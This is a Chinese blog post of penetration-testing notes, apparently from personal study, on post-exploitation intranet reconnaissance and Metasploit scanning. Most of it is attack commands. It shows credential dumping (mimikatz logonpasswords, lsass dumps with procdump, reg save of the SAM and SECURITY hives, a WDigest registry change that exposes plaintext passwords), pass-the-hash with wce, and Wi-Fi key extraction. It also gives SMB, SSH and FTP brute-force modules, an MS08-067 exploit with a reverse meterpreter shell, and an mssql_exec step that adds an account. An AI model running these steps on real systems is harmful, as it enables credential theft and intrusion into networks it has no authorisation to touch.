刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

内网信息收集

后渗透攻防:
https://www.secpulse.com/archives/51527.html
https://3gstudent.github.io/

目录

一、内网信息收集

1.内网基础信息:

2.内网核心业务信息:

3.其他信息

二、内网实战(命令、工具及脚本)

1.用户列表、当前权限等

2.内网网络拓扑等信息

3.进程列表

4.端口信息

5.补丁信息

6.本地用户习惯

7.凭证收集

8.系统哈希或明文密码获取

9.星号查看

三、内网权限拓展(常见应用漏洞):


一、内网信息收集

1.内网基础信息:

(1)内网网段信息:网段信息有助于我们对渗透的内网进行拓扑、分区。以拿下边界服务器为例,得到一定的控制权之后,一定要查看网卡信息,这样就收集到内部网络地址段的信息,进一步渗透,找到更多的内部网络地址。

(2)内网大小:有助于我们了解整个公司的网络分布与组成,帮助我们寻找内网核心业务。

2.内网核心业务信息:

内网OA办公系统(大公司)、邮件服务器(大公司才有)、网络监控系统(一般都有)、财务应用系统、核心产品源码(对于IT公司,会架设自己的svn或者git服务器)

3.其他信息

系统管理员密码。

其他用户session,3389和ipc$连接记录,各用户回收站信息。

浏览器密码和浏览器cookie获取。

windows无线密码获取(利用netsh),数据库密码获取。

host文件获取和dns缓存信息收集等,可以查看DNS服务器的IP,如果是域,一般情况DNS服务器和域控是同一台!先定位出DNS服务器,再进行后面渗透。

杀软、补丁、进程、网络代理信息wpad信息(Web Proxy Auto-Discovery Protocol,是客户端通过DHCP或DNS协议探测代理服务器配置脚本url的一种方式),软件列表信息。

计划任务、帐号密码策略与锁定策略、共享文件夹、web服务器配置文件。

VPN历史密码等、TeamView密码等、启动项、iislog等。

常用的后渗透信息收集工具、PowerShell+各种内网渗透工具的使用。

二、内网实战(命令、工具及脚本)

1.用户列表、当前权限等

win:whoami、net user、net user 用户名、 net accounts

linux:whoami、id、who、cat /etc/passwd、cat /etc/group

2.内网网络拓扑等信息

以下两条命令可以查看无线网密码

netsh wlan show profiles

netsh wlan show profile name=“网络链接配置文件” key=clear

在这里插入图片描述

在这里插入图片描述


除此,常用的有ipconfig、nslookup等等

3.进程列表

win:tasklist linux: ps、 top

4.端口信息

win: netstat -ano linux: netstat -ntulp 、ps -aux

5.补丁信息

win系统:systeminfo

wmic qfe list full

wmic qfe list full /format:htable>c:\hotfixes.html

第三条命令导出html到指定位置,浏览器打开效果如下

在这里插入图片描述

linux:看一下是否有samba服务,或者使用rpm -qa来查询安装了哪些软件包,有一些可以通过名字来判断出是补丁包。

6.本地用户习惯

c:\windows\SchedLgU.txt,如果未启动remote Storage Engine服务(win7和server03上都没找到此服务)和Task Scheduler服务,则不会记录。

c:\windows\Prefetch文件夹,里面记录着用户运行的程序列表。(已验证)

c:\Users\用户名\Recent文件夹,记录最近打开过的文件和文件夹(xp及server03是在c:\Documents and Settings\用户名\Recent)

查看收藏夹、文档目录等。

7.凭证收集

常用工具mimikatz、wce、Invoke-WCMDump、vaultcmd(win系统自带)

CredentialManager,中文翻译为凭据管理器,用来存储凭据(如网站登陆和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再进行对应的操作,系统会自动填入凭据,实现自动登陆,凭据保存在特定的位置,被称作保管库(vault,位于%localappdata%/Microsoft\Vault)

Invoke-WCMDum PowerShell脚本,从凭据管理器导出Windows凭据

下载https://github.com/peewpw/Invoke-WCMDump

PS>Import-Module .\Invoke-WCMDump.ps1

PS>Invoke-WCMDump

参考:http://www.4hou.com/technology/9397.html

在这里插入图片描述

vaultcmd命令(win系统自带),导出的不是明文密码,本人不会利用
列出保管库(vault)列表:vaultcmd /list
列出保管库(vault)概要,凭据名称和GUID:vaultcmd /listschema

在这里插入图片描述

其他命令:cmdkey /list

8.系统哈希或明文密码获取

详细理论参考6月25日笔记,最方便的方法是利用cmd执行reg save命令从注册表导出。

XP等系统的密码位数超过14时,会采用NTLM加密,小于14位是LM。win7等更高版本,应该是NTLM。

test:1003:E52CAC67419A9A22664345140A852F61:67A54E1C9058FCA16498061B96863248:::

注意被冒号隔断的两组长字符串,前面是LM hash,后面是NTLM hash,hash一般存在两个地方:sam文件(system文件也需要),NTDS.DIT文件,存在域控上对应域用户。

(1)mimikatz获取明文(一般会报毒)

要以管理员身份运行,一般用在桌面环境。如果是终端条件,使用能以系统管理员身份运行的程序去调用mimikatz,执行以下两条命令就OK.

privilege::debug

sekurlsa::logonpasswords

(2)注册表导出,本地分析(较安全准确)

win2000和XP需要先提权到system权限,server03开始,可以直接reg save,文件可能较大,效率低,但比较准确可靠。

reg save hklm\sam sam.hive(也可省略.hive,但二者有何区别暂不清楚)

reg save hklm\system system.hive

reg save hklm\security security.hive(这个文件什么用途暂不清楚)

(3)Get-PassHashes脚本

cd c:\phpstudy\www (在终端先切换到ps1脚本目录)

powershell -ExecutionPolicy Bypass(设置会话默认执行策略,并进入PS)

import-module .\Get-PassHashes.ps1 (导入模块)

Get-PassHashes(大小写不敏感)

在这里插入图片描述

(4)wce读取明文,哈希注入

抓取明文(wce.exe -w,wce支持win系统绝大多数版本)

很快就能显示,但密码位数过长时,偶尔可能不准确,如下面第一张图,显示的密码中间少了两位,第二张图长度更长了,但显示的密码却是正确的

win8和server2012如果抓不出,在目标机修改注册表(CMD运行下命令)

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

在这里插入图片描述

在这里插入图片描述

获取明文并保存

wce -o output.txt

type output.tx

wce的hash注入 https://blog.csdn.net/yiyefangzhou24/article/details/28631223

hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了。hash注入本身是为了对付那些破解不了的NTHASH

wce.exe -s <username>:<domain>:<lmhash>:<nthash>

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c cmd.exe

配合上面提到的Get-PassHashes脚本,本地进行hash注入后,成功列出了目标机的文件。两个主机互测,一次成功了,但测试前没有尝试第二张图,不知是否是hash注入影响。攻守互换后,不成功。

在这里插入图片描述

在这里插入图片描述

当提示注入成功的时候,这时候键入net use命令并没有看到有连接,其实已经可以连接了,直接使用ipc命令操作对方的机器就可以了。

域里的域用户hash也可以使用wce进行注入,只需要把命令格式变一变就行 wce.exe -s 用户名:域名:LM-HASH:NT-HASH

(5)procdump(微软出品)+本地用mimikatz得明文,较安全

参考:http://www.91ri.org/6881.html

原帖英文 :http://blog.gentilkiwi.com/securite/mimikatz/minidump

mimikatz1.0版本直接用不行(需要先注入sekurlsa.dll),2.1.1 x64版本试验OK,另外路径中最好不要出现中文,且需要以管理员权限运行。

我们运行mimikatz的平台要与进行dump的系统(source dump)兼容,假如你攻击的server2008,你需要用nt6平台使用mimikatz,兼容性如下:

在这里插入图片描述

1)获取dump
NT6可以使用任务管理器进行dump:
个人觉得用到情况较少,一般有桌面环境,可以考虑直接运行mimikatz

在这里插入图片描述

也可使用procdump(win7亲测可用):

官网下载http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

procdump.exe -accepteula -ma lsass.exe lsass.dmp

原帖中是通过ipc$入侵得到的dump文件,我是通过木马,使用菜刀连接上传procdump,靶机这边我用的是管理员权限,之所以这样做,是考虑到实战中,如果是低权限用户,也不会费劲的去破解对方密码吧。

2)本地破解密码

攻击者是win7,使用mimikatz的环境也要用NT6,把dmp文件放在mimikatz程序目录下。

进入目录后,直接输入mimikatz并回车,注意权限,再运行下面两个命令。成功得到系统密码,我这里还用了syskey加密,仍然得到了明文。

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

在这里插入图片描述

9.星号查看

通过hook函数或者改变变量属性值来查看明文。

通过改js代码,或使用浏览器插件可显示网页中星号的明文,但实战个人猜测用处不大,https://jingyan.baidu.com/article/fea4511a0f875df7bb91258f.html

三、内网权限拓展(常见应用漏洞):

strust2、Zabbix、Axis2、ImageMagick、FastCGI、redis、Hadoop

struts攻击参考:

https://www.anquanke.com/post/id/85674

https://www.cnblogs.com/peterpan0707007/p/7495649.html

https://www.anquanke.com/post/id/85744





Kali Linux渗透测试 143 Mestasploit 信息收集




模块位置:


信息收集的模块都在 auxiliary/scanner/ 之下


msf > use auxiliary/scanner/ [TAB]

Display all 531 possibilities? (y or n)

1

2

1. db_nmap

跟 nmap 用法一样,结果存放在 msf 的数据库中


msf > db_nmap -sV 10.10.10.0/24

1



auxiliary 目录下


RHOSTS <> RHOST


192.168.1.20-192.168.1.30、192.168.1.0/24,192.168.11.0/24

也可以编写地址列表:file:/root/h.txt

2. 主机发现扫描

use auxiliary/scanner/discovery/arp_sweep

set INTERFACE、RHOSTS、SHOST、SMAC、THREADS;run


msf > search arp

msf > use auxiliary/scanner/discovery/arp_sweep

msf auxiliary(scanner/discovery/arp_sweep) > show options 

msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 10.10.10.0/24

msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0

msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20

msf auxiliary(scanner/discovery/arp_sweep) > run

1

2

3

4

5

6

7



3. 端口扫描

use auxiliary/scanner/portscan/syn

set INTERFACE、PORTS、RHOSTS、THREADS;run


msf > search portscan

msf > use auxiliary/scanner/portscan/syn

msf auxiliary(scanner/portscan/syn) > show options 

msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0

msf auxiliary(scanner/portscan/syn) > set PORTS 80

msf auxiliary(scanner/portscan/syn) > set RHOSTS 10.10.10.0/24

msf auxiliary(scanner/portscan/syn) > set THREADS 50

msf auxiliary(scanner/portscan/syn) > run

1

2

3

4

5

6

7

8

4. 僵尸扫描

查找 ipidseq 主机(查找僵尸机)


use auxiliary/scanner/ip/ipidseq

set RHOSTS 192.168.1.0/24 ;run

nmap -PN -sI 10.10.10.147 10.10.10.132


msf > use auxiliary/scanner/ip/ipidseq

msf auxiliary(scanner/ip/ipidseq) > show options 

msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 10.10.10.100-150

msf auxiliary(scanner/ip/ipidseq) > set THREADS 20

msf auxiliary(scanner/ip/ipidseq) > run

1

2

3

4

5



msf > db_nmap -PN -sI 10.10.10.147 10.10.10.132

1



5. UDP 扫描

use auxiliary/scanner/discovery/udp_sweep

use auxiliary/scanner/discovery/udp_probe


msf > use auxiliary/scanner/discovery/udp_sweep

msf auxiliary(scanner/discovery/udp_sweep) > show options 

msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.10.10.100-150

msf auxiliary(scanner/discovery/udp_sweep) > run

1

2

3

4



msf > use auxiliary/scanner/discovery/udp_probe

msf auxiliary(scanner/discovery/udp_probe) > show options 

msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.10.10.100-150

msf auxiliary(scanner/discovery/udp_probe) > set CHOST 10.10.10.131

msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20

msf auxiliary(scanner/discovery/udp_probe) > run

1

2

3

4

5

6



6. 密码嗅探

use auxiliary/sniffer/psnuffle

支持从 pacap 抓包文件中提取密码

功能类似于 dsniff

目前只支持 pop3、imap、ftp、HTTP GET 协议


msf > search sniffer

msf > use auxiliary/sniffer/psnuffle

msf auxiliary(sniffer/psnuffle) > show options 

msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0

msf auxiliary(sniffer/psnuffle) > run

1

2

3

4

5



root@kali:~# ftp 10.10.10.148

1



# 继续上述

msf auxiliary(sniffer/psnuffle) > show options

msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng

msf auxiliary(sniffer/psnuffle) > jobs

msf auxiliary(sniffer/psnuffle) > kill 0

msf auxiliary(sniffer/psnuffle) > run

1

2

3

4

5

6



7. SNMP 扫描

vim /etc/snmp/snmpd.conf (侦听复制修改为 0.0.0.0:161)

use auxiliary/scanner/snmp/snmp_login

use auxiliary/scanner/snmp/snmp_enum

use auxiliary/scanner/snmp/snmp_enumusers (windows)

use auxiliary/scanner/snmp/snmp_enumshares (windows)


msf > use auxiliary/scanner/snmp/snmp_login

msf auxiliary(scanner/snmp/snmp_login) > show options 

msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 10.10.10.149

msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20

msf auxiliary(scanner/snmp/snmp_login) > run

1

2

3

4

5



msf > use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > show options 

msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.149

msf auxiliary(scanner/snmp/snmp_enum) > run

1

2

3

4



msf > use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > show options 

msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.142 (windows)

msf auxiliary(scanner/snmp/snmp_enum) > run

msf auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY jlcssadmin (SNMP 服务器团体名)

msf auxiliary(scanner/snmp/snmp_enum) > set THREADS 20

msf auxiliary(scanner/snmp/snmp_enum) > run

1

2

3

4

5

6

7



msf > use auxiliary/scanner/snmp/snmp_enumusers

msf auxiliary(scanner/snmp/snmp_enumusers) > show options 

msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin

msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 10.10.10.142

msf auxiliary(scanner/snmp/snmp_enumusers) > run

1

2

3

4

5



msf > use auxiliary/scanner/snmp/snmp_enumshares

msf auxiliary(scanner/snmp/snmp_enumshares) > show options 

msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin

msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 10.10.10.142

msf auxiliary(scanner/snmp/snmp_enumshares) > run

1

2

3

4

5



8. SMB 扫描

SMB 版本扫描


use auxiliary/scanner/smb/smb_version

扫描命令管道。判断 SMB 服务类型(账号、密码)


use auxiliary/scanner/smb/pipe_auditor

扫描通过 SMB 管道可以访问的 RCERPC 服务


use auxiliary/scanner/smb/pipe_dcerpc_auditor

SMB 共享账号(账号、密码)


use auxiliary/scanner/smb/smb_enumshares

SMB 用户枚举(账号、密码)


use auxiliary/scanner/smb/smb_enumusers

SID 枚举(账号、密码)


use auxiliary/scanner/smb/smb_lookupsid

SMB 版本扫描


msf > search smb

msf > use auxiliary/scanner/smb/smb_version

msf auxiliary(scanner/smb/smb_version) > show options 

msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.147, 10.10.10.148, 10.10.10.142

msf auxiliary(scanner/smb/smb_version) > run

1

2

3

4

5



# 继续上述

msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator

msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456

msf auxiliary(scanner/smb/smb_version) > run

1

2

3

4



扫描命令管道。判断 SMB 服务类型(账号、密码)


msf > use auxiliary/scanner/smb/pipe_auditor

msf auxiliary(scanner/smb/pipe_auditor) > show options 

msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.148

msf auxiliary(scanner/smb/pipe_auditor) > run

1

2

3

4



# 继续上述

msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator

msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456

1

2

3



扫描通过 SMB 管道可以访问的 RCERPC 服务


msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor

msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options 

msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 10.10.10.148

msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run

1

2

3

4



# 继续上述

msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBUser Administrator

msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBPass 123456

msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run

1

2

3

4



SMB 共享账号(账号、密码)


msf > use auxiliary/scanner/smb/smb_enumshares

msf auxiliary(scanner/smb/smb_enumshares) > show options 

msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 10.10.10.148

msf auxiliary(scanner/smb/smb_enumshares) > run

1

2

3

4



# 继续上述

msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator

msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456

msf auxiliary(scanner/smb/smb_enumshares) > run

1

2

3

4



SMB 用户枚举(账号、密码)


msf > use auxiliary/scanner/smb/smb_enumusers

msf auxiliary(scanner/smb/smb_enumusers) > show options 

msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 10.10.10.148

msf auxiliary(scanner/smb/smb_enumusers) > run

1

2

3

4



# 继续上述

msf auxiliary(scanner/smb/smb_enumusers) > set SMBUser Administrator

msf auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456

msf auxiliary(scanner/smb/smb_enumusers) > run

1

2

3

4



SID 枚举(账号、密码)


msf > use auxiliary/scanner/smb/smb_lookupsid

msf auxiliary(scanner/smb/smb_lookupsid) > show options 

msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 10.10.10.148

1

2

3



# 继续上述

msf auxiliary(scanner/smb/smb_lookupsid) > set SMBUser Administrator

msf auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456

msf auxiliary(scanner/smb/smb_lookupsid) > run

1

2

3

4



9. SSH 扫描

SSH 版本扫描


use auxiliary/scanner/ssh/ssh_version

SSH 密码爆破


use auxiliary/scanner/ssh/ssh_login 

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt ;set VERBOSE false ;run

SSH 公钥登陆


use auxiliary/scanner/ssh/ssh_login_pubkey 

set KEY_FILE id_rsa;set USERNAME root ;run

SSH 版本扫描


msf > use auxiliary/scanner/ssh/ssh_version

msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 10.10.10.132

msf auxiliary(scanner/ssh/ssh_version) > run

1

2

3



SSH 密码爆破


root@kali:~# more /usr/share/metasploit-framework/data/wordlists/root_userpass.txt 


msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.132

msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false 

msf auxiliary(scanner/ssh/ssh_login) > run

1

2

3

4

5

6

7



SSH 公钥登陆


msf > use auxiliary/scanner/ssh/ssh_login_pubkey

msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 10.10.10.132

msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root

msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file

1

2

3

4

10. windows 缺少的补丁

基于已经取得的 session 进行检测

use post/windows/gather/enum_patches


show advanced

set VERBOSE yes

检查失败


known bug in WMI query, try migrating to another process

迁移到另一个进程再次进行尝试

ms08-067


msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.147

msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

msf exploit(windows/smb/ms08_067_netapi) > run

1

2

3

4



meterpreter > backgroun

msf exploit(windows/smb/ms08_067_netapi) > sessions 

1

2



msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches

msf post(windows/gather/enum_patches) > set SESSION 4

msf post(windows/gather/enum_patches) > run

1

2

3



# 进程错误,迁移进程

msf post(windows/gather/enum_patches) > sessions -i 4

meterpreter > getpid

meterpreter > ps

meterpreter > migrate 828  # spoolsv.exe

meterpreter > background 

msf post(windows/gather/enum_patches) > run

1

2

3

4

5

6

7



11. mssql 扫描

mssql 扫描端口


TCP 1422(动态端口)/ UDP 1434 (查询 TCP 端口号)

use auxiliary/scanner/mssql/mssql_ping

爆破 mssql 密码


use auxiliary/scanner/mssql/mssql_login

远程执行代码(获取数据库权限之后)


use auxiliary/admin/mssql/mssql_exec

set CMD net user user1 pass123 /ADD

mssql 扫描端口


msf > use auxiliary/scanner/mssql/mssql_ping

msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 10.10.10.142

msf auxiliary(scanner/mssql/mssql_ping) > run

1

2

3

12. FTP 扫描

ftp 版本扫描


use auxiliary/scanner/ftp/ftp_version

use auxiliary/scanner/ftp/anonymous

use auxiliary/scanner/ftp/ftp_login

use auxiliary/scanner/ [tab]


Display all 479 possibilities? (y or n)

查询版本信息


msf > use auxiliary/scanner/ftp/ftp_version

msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.132

msf auxiliary(scanner/ftp/ftp_version) > run

1

2

3



是否允许匿名登录


msf > use auxiliary/scanner/ftp/anonymous

msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.132

msf auxiliary(scanner/ftp/anonymous) > run

1

2

3



暴力破解


use auxiliary/scanner/ftp/ftp_login


发表评论:

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.